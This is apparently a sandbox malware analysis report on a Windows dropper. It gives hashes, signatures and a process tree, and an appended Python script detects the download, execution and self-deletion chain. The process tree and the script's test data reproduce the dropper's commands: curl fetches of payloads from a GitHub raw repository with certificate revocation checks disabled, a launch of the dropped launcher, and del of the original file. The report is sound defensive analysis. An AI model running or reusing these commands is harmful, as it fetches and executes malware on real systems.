Analysis
max time kernel: 119s
max time network: 121s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23/08/2024, 13:37
Static task: static1
Behavioral task: behavioral1
  Sample: 2d3384ff117bd91e1d2efda9deede540N.exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: 2d3384ff117bd91e1d2efda9deede540N.exe
  Resource: win10v2004-20240802-en
General
Target: 2d3384ff117bd91e1d2efda9deede540N.exe
Size: 1.2MB
MD5: 2d3384ff117bd91e1d2efda9deede540
SHA1: 155a7f799c3442da467754c95ef2524d5a6969b1
SHA256: 0c53c6891733c2e3c70baf93e4da635aa25cc18b984ef619cbcc2d7c8960079f
SHA512: 6a07a17f508425b7bcd10f16242ee3e3ab8ec5e553cfb72fef3e450bd66dae20de8b7dac2a204d233bf463e36e430bc9f1f593fb12938d8d0eb3f3c9369dec7d
SSDEEP: 24576:ErORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaZZlMF4:E2EYTb8atv1orq+pEiSDTj1VyvBa1M
Malware Config
Signatures
Downloads MZ/PE file

Executes dropped EXE (1 IoC)
pid   Process
4208  RewAdIs_Launcher_v08.exe

Indicator Removal: File Deletion (1 TTP)
Adversaries may delete files left behind by the actions of their intrusion activity.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 6 IoCs)
flow  ioc
15    raw.githubusercontent.com
26    raw.githubusercontent.com
27    raw.githubusercontent.com
33    raw.githubusercontent.com
3     raw.githubusercontent.com
4     raw.githubusercontent.com

AutoIT Executable (1 IoC)
AutoIT scripts compiled to PE executables.
resource                                    yara_rule
behavioral2/files/0x000e0000000233df-7.dat  autoit_exe

Suspicious use of FindShellTrayWindow (64 IoCs)
pid   Process
4208  RewAdIs_Launcher_v08.exe (the same entry is listed 64 times)

Suspicious use of SendNotifyMessage (64 IoCs)
pid   Process
4208  RewAdIs_Launcher_v08.exe (the same entry is listed 64 times)

Suspicious use of WriteProcessMemory (32 IoCs; each row below is recorded twice)
description                       pid   Process                                procid_target
PID 1392 wrote to memory of 3080  1392  2d3384ff117bd91e1d2efda9deede540N.exe  84
PID 3080 wrote to memory of 4384  3080  cmd.exe                                86
PID 1392 wrote to memory of 3144  1392  2d3384ff117bd91e1d2efda9deede540N.exe  90
PID 1392 wrote to memory of 5064  1392  2d3384ff117bd91e1d2efda9deede540N.exe  92
PID 1392 wrote to memory of 5016  1392  2d3384ff117bd91e1d2efda9deede540N.exe  94
PID 5016 wrote to memory of 3484  5016  cmd.exe                                96
PID 1392 wrote to memory of 4820  1392  2d3384ff117bd91e1d2efda9deede540N.exe  98
PID 4820 wrote to memory of 4208  4820  cmd.exe                                100
PID 4208 wrote to memory of 4832  4208  RewAdIs_Launcher_v08.exe               101
PID 4832 wrote to memory of 4744  4832  cmd.exe                                103
PID 4208 wrote to memory of 5092  4208  RewAdIs_Launcher_v08.exe               104
PID 4208 wrote to memory of 3968  4208  RewAdIs_Launcher_v08.exe               106
PID 4208 wrote to memory of 4556  4208  RewAdIs_Launcher_v08.exe               108
PID 4556 wrote to memory of 2680  4556  cmd.exe                                112
PID 4208 wrote to memory of 5048  4208  RewAdIs_Launcher_v08.exe               118
PID 5048 wrote to memory of 1792  5048  cmd.exe                                120
Processes
[1] PID 1392  C:\Users\Admin\AppData\Local\Temp\2d3384ff117bd91e1d2efda9deede540N.exe
    "C:\Users\Admin\AppData\Local\Temp\2d3384ff117bd91e1d2efda9deede540N.exe"
    - Suspicious use of WriteProcessMemory
  [2] PID 3080  C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
      - Suspicious use of WriteProcessMemory
    [3] PID 4384  C:\Windows\system32\curl.exe
        curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
  [2] PID 3144  C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del ndx
  [2] PID 5064  C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del
  [2] PID 5016  C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/RewAdIs_Launcher_v08.exe --ssl-no-revoke -o RewAdIs_Launcher_v08.exe
      - Suspicious use of WriteProcessMemory
    [3] PID 3484  C:\Windows\system32\curl.exe
        curl https://raw.githubusercontent.com/TROguz/ndx/main/RewAdIs_Launcher_v08.exe --ssl-no-revoke -o RewAdIs_Launcher_v08.exe
  [2] PID 4820  C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c RewAdIs_Launcher_v08.exe
      - Suspicious use of WriteProcessMemory
    [3] PID 4208  C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v08.exe
        RewAdIs_Launcher_v08.exe
        - Executes dropped EXE
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of WriteProcessMemory
      [4] PID 4832  C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
          - Suspicious use of WriteProcessMemory
        [5] PID 4744  C:\Windows\system32\curl.exe
            curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
      [4] PID 5092  C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c del ndx
      [4] PID 3968  C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c del 2d3384ff117bd91e1d2efda9deede540N.exe
      [4] PID 4556  C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/z.exe,main/z.dll}
          - Suspicious use of WriteProcessMemory
        [5] PID 2680  C:\Windows\system32\curl.exe
            curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/z.exe,main/z.dll}
      [4] PID 5048  C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/ISKA.7z.001,main/ISKA.7z.002}
          - Suspicious use of WriteProcessMemory
        [5] PID 1792  C:\Windows\system32\curl.exe
            curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/ISKA.7z.001,main/ISKA.7z.002}
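Detection logic for the chain above, as an added example that is not part of the sandbox report or of the sample. It replays process-creation events constructed from the command lines and PIDs in the process tree (the ProcEvent schema, the root's parent PID 0 and the field names are assumptions, modelled on Sysmon Event ID 1 rather than any product's real format) and correlates three things a practitioner wants out of this tree: what curl wrote to disk, including the brace-globbed `-O` fetches, which curl expands to two URLs each and saves under the remote names z.exe, z.dll, ISKA.7z.001 and ISKA.7z.002; later execution of a file that came from curl (the dropped RewAdIs_Launcher_v08.exe); and `del` of a downloaded file or of an ancestor process's own image (PID 3968 deleting the original dropper). It also flags every curl run with `--ssl-no-revoke`, which on Windows tells curl's Schannel backend to skip certificate revocation checks.

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field
from posixpath import basename as url_basename
from urllib.parse import urlparse

ABUSED_HOSTS = {"raw.githubusercontent.com"}  # legitimate hosts commonly used to stage payloads

# Assumed event schema, modelled on process-creation telemetry (e.g. Sysmon Event ID 1).
ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

@dataclass
class Findings:
    downloads: dict = field(default_factory=dict)          # lower-cased local name -> source URL
    abused_hosts: set = field(default_factory=set)
    no_revoke_pids: list = field(default_factory=list)     # curl run with --ssl-no-revoke
    executed_dropped: list = field(default_factory=list)   # (pid, file): a curl output is now running
    deleted_downloads: list = field(default_factory=list)  # (pid, file): del of a curl output
    self_delete: list = field(default_factory=list)        # (pid, file): del of an ancestor's image

def win_basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1]

def expand_curl_glob(url: str) -> list:
    """Expand one curl brace glob {a,b} into the URLs curl fetches ([1-3] ranges not handled)."""
    m = re.search(r"\{([^{}]*)\}", url)
    if not m:
        return [url]
    return [url[:m.start()] + alt + url[m.end():] for alt in m.group(1).split(",")]

def curl_downloads(cmdline: str) -> list:
    """(url, local_name) pairs a curl command line writes: -o names the file, -O keeps the remote name."""
    toks = cmdline.split()
    start = next((i + 1 for i, t in enumerate(toks) if win_basename(t).lower() in ("curl", "curl.exe")), None)
    if start is None:
        return []
    urls, out, remote, i = [], None, False, start
    while i < len(toks):
        if toks[i] in ("-o", "--output") and i + 1 < len(toks):
            out, i = toks[i + 1], i + 1
        elif toks[i] in ("-O", "--remote-name"):
            remote = True
        elif not toks[i].startswith("-"):
            urls.extend(expand_curl_glob(toks[i]))
        i += 1
    return [(u, out or url_basename(urlparse(u).path)) for u in urls if out or remote]

def analyse(events: list) -> Findings:
    """One pass over creation-ordered events: record curl outputs, then flag their execution and deletion."""
    by_pid, f = {e.pid: e for e in events}, Findings()
    for e in events:
        for url, name in curl_downloads(e.cmdline):
            f.downloads[name.lower()] = url
            if urlparse(url).hostname in ABUSED_HOSTS:
                f.abused_hosts.add(urlparse(url).hostname)
        if "--ssl-no-revoke" in e.cmdline.split():  # Schannel certificate revocation checks disabled
            f.no_revoke_pids.append(e.pid)
        image = win_basename(e.image)
        if image.lower() in f.downloads:
            f.executed_dropped.append((e.pid, image))
        m = re.search(r"/c\s+del\s+(\S+)", e.cmdline, re.I)
        if m:
            target = win_basename(m.group(1))
            if target.lower() in f.downloads:
                f.deleted_downloads.append((e.pid, target))
            p = e.ppid  # walk up the parent chain looking for a process whose image is being deleted
            while p in by_pid and win_basename(by_pid[p].image).lower() != target.lower():
                p = by_pid[p].ppid
            if p in by_pid:
                f.self_delete.append((e.pid, target))
    return f

# Constructed from the report's process tree (PIDs as listed; parent PID 0 for the root is a placeholder).
REPO = "https://raw.githubusercontent.com/TROguz/ndx/"
SYS, TMP = "C:\\Windows\\system32\\", "C:\\Users\\Admin\\AppData\\Local\\Temp\\"
DROPPER, LAUNCHER = "2d3384ff117bd91e1d2efda9deede540N.exe", "RewAdIs_Launcher_v08.exe"
CURL_PC = f"curl {REPO}main/pc --ssl-no-revoke -o ndx"
CURL_LAUNCHER = f"curl {REPO}main/{LAUNCHER} --ssl-no-revoke -o {LAUNCHER}"
CURL_Z = f"curl --ssl-no-revoke -O {REPO}{{main/z.exe,main/z.dll}}"
CURL_7Z = f"curl --ssl-no-revoke -O {REPO}{{main/ISKA.7z.001,main/ISKA.7z.002}}"
EVENTS = [
    ProcEvent(1392, 0, TMP + DROPPER, f'"{TMP}{DROPPER}"'),
    ProcEvent(3080, 1392, SYS + "cmd.exe", f"{SYS}cmd.exe /c {CURL_PC}"),
    ProcEvent(4384, 3080, SYS + "curl.exe", CURL_PC),
    ProcEvent(3144, 1392, SYS + "cmd.exe", f"{SYS}cmd.exe /c del ndx"),
    ProcEvent(5064, 1392, SYS + "cmd.exe", f"{SYS}cmd.exe /c del"),
    ProcEvent(5016, 1392, SYS + "cmd.exe", f"{SYS}cmd.exe /c {CURL_LAUNCHER}"),
    ProcEvent(3484, 5016, SYS + "curl.exe", CURL_LAUNCHER),
    ProcEvent(4820, 1392, SYS + "cmd.exe", f"{SYS}cmd.exe /c {LAUNCHER}"),
    ProcEvent(4208, 4820, TMP + LAUNCHER, LAUNCHER),
    ProcEvent(4832, 4208, SYS + "cmd.exe", f"{SYS}cmd.exe /c {CURL_PC}"),
    ProcEvent(4744, 4832, SYS + "curl.exe", CURL_PC),
    ProcEvent(5092, 4208, SYS + "cmd.exe", f"{SYS}cmd.exe /c del ndx"),
    ProcEvent(3968, 4208, SYS + "cmd.exe", f"{SYS}cmd.exe /c del {DROPPER}"),
    ProcEvent(4556, 4208, SYS + "cmd.exe", f"{SYS}cmd.exe /c {CURL_Z}"),
    ProcEvent(2680, 4556, SYS + "curl.exe", CURL_Z),
    ProcEvent(5048, 4208, SYS + "cmd.exe", f"{SYS}cmd.exe /c {CURL_7Z}"),
    ProcEvent(1792, 5048, SYS + "curl.exe", CURL_7Z),
]
```

`analyse(EVENTS)` returns a Findings object whose fields name the offending PIDs and files, so the same correlations can be lifted into a SIEM query over Sysmon Event ID 1 or Windows Security Event 4688; note that 4688 only carries the command line when process-creation command-line auditing is enabled, and the `del` and `-o` correlations depend on it.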
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 63B
MD5: b57cd2f14edb7fe9e984e27c204f76a5
SHA1: e949c42c36539e2cce8a1ea55ed094b345fcfee6
SHA256: 07ff7e593852214d9a284a4434cda9e0b63bb32f966657948395d04f8143b5e5
SHA512: a78245e3c68dfa68598955516214a5cc64976f6f902f0dd768c26c2d860e7cb139b34bb7d1117d89c1a51b59ffc3175b3077f32821ac35320a5175228a147c49

Filesize: 27KB
MD5: 494eff8bdaa7322ad7ecf159d8feede1
SHA1: ceaacc7452d910065af126872a091efe93e88b1d
SHA256: fc27524bb6f93c05f3d5e161794f3732d1411c6150c143c2abeb1485208a46a5
SHA512: 4f4f1299232a452df3205cdf98aa0e77c9fd0f77be57175b18a2abbe78dec4efb386b6c10e0d55f66dad81c1a1472d67e3156260ff85edca158814961b3af095

Filesize: 2B
MD5: 88dba0c4e2af76447df43d1e31331a3d
SHA1: 36f780fdbda5b2b2ce85c9ebb57086d1880ae757
SHA256: 21d017c40a91c15748f0b98cd826ba445d2d3fe227e310bfd58dcb6c431826a0
SHA512: 4c34894f42b47ee156997e54e03425f820a3aad6fe8c863d4a07b57c168e846db1a31d1230cec16643b9f1219c38e91331558842dd24a142fee381e465b751ce

Filesize: 1.3MB
MD5: ad28c9e121bc41ccc97abf25b9f3fd6a
SHA1: 9f5ee915a6fb5adec222ac7d8e61f56d63f9d7c6
SHA256: d09687fc091b741211f3f9341efd189f1277036f86de1b68d8823eb701da6022
SHA512: 59395025683308a623114b75bf642179335d24de22b94aa4dc89feabb88b70ebb2fc794c6c7f43c3d4fe0ba7f42f29c954c22048b07180c90cb54c88921240b5